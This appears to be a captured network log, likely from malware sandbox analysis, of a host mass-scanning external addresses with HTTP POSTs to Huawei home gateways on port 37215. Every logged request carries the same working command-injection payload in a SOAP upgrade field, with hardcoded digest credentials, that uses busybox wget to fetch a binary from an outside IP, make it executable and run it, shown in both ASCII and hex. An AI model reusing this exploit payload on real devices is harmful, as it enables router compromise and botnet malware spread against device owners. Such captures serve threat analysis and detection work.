                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1888192.168.2.154407045.240.203.11637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948771000 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1889192.168.2.155467041.182.70.24937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948792934 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1890192.168.2.154842458.43.85.137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948821068 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1891192.168.2.1534906222.154.50.3237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948836088 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1892192.168.2.1547130138.128.194.20037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948875904 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1893192.168.2.154150237.58.20.2537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948883057 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1894192.168.2.1544112122.151.229.24037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948899984 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1895192.168.2.1543904138.86.7.4537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948915958 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1896192.168.2.1539916157.205.89.18537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948937893 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1897192.168.2.1548448102.250.195.7837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948962927 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1898192.168.2.1548642157.56.238.5637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948975086 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
